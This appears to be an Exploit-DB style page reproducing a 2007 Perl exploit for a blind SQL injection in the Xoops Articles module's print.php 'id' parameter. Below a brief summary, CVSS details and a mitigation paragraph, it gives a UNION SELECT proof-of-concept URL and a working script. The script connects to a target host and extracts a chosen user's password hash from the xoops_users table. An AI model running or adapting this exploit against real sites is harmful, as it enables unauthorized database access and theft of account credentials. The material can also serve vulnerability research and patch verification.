Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

vendor:

Xoops

by:

UniquE-Key

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Xoops

Affected Version From: All Version

Affected Version To: All Version

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

Blind SQL Injection exploit and proof of concept for Xoops All Version -Articles- Print.PHP (ID). The exploit allows an attacker to execute arbitrary SQL queries by injecting malicious code into the 'id' parameter of the print.php page. The proof of concept URL demonstrates the exploitation of the vulnerability by injecting a UNION SELECT statement. The exploit is coded in Perl and uses IO::Socket module to send HTTP requests to the target server.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Additionally, regular security audits and vulnerability assessments should be conducted to identify and patch any vulnerabilities.

Source

Exploit-DB raw data:

#!/usr/bin/perl -w

# Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit And PoC

# Type :

# SQL Injection

# Release Date :

# {2007-03-26}

# Product / Vendor :

# http://support.sirium.net/

# Bug :

# http://localhost/script/modules/articles/print.php?id=x AND 1=1 or 1=0

# PoC :

# http://localhost/script/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,uid,uname,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/LIMIT/**/1,1/*

# Exploit :

#############################################
#Exploit Coded By UNIQUE-KEY[UNIQUE-CRACKER]#
#############################################

use IO::Socket;

if (@ARGV != 3)
{
    print "\n-----------------------------------\n";
    print "Xoops All Version -Articles- Print.PHP (ID) Blind SQL Injection Exploit\n";
    print "-----------------------------------\n";
    print "\nUniquE-Key{UniquE-Cracker}\n";
    print "UniquE[at]UniquE-Key.ORG\n";
    print "http://UniquE-Key.ORG\n";
    print "\n-----------------------------------\n";
    print "\nUsage: $0 <server> <path> <uid>\n";
    print "Examp: $0 www.victim.com /path 1\n";
    print "\n-----------------------------------\n";
    exit ();
}

$server = $ARGV[0];
$path = $ARGV[1];
$uid = $ARGV[2];

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",  PeerPort => "80");
printf $socket ("GET %s/modules/articles/print.php?id=3/**/UNION/**/SELECT/**/NULL,NULL,NULL,NULL,NULL,pass,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/xoops_users/**/WHERE/**/uid=$uid/* HTTP/1.0\nHost: %s\nAccept: */*\nConnection: close\n\n",
$path,$server,$uid);

while(<$socket>)

{
    if (/\>(\w{32})\</) { print "\nID '$uid' User Password :\n\n$1\n"; }
}

# Tested :

# All Version

# Author :

# UniquE-Key{UniquE-Cracker}
# UniquE(at)UniquE-Key.Org
# http://www.UniquE-Key.Org

# milw0rm.com [2007-03-27]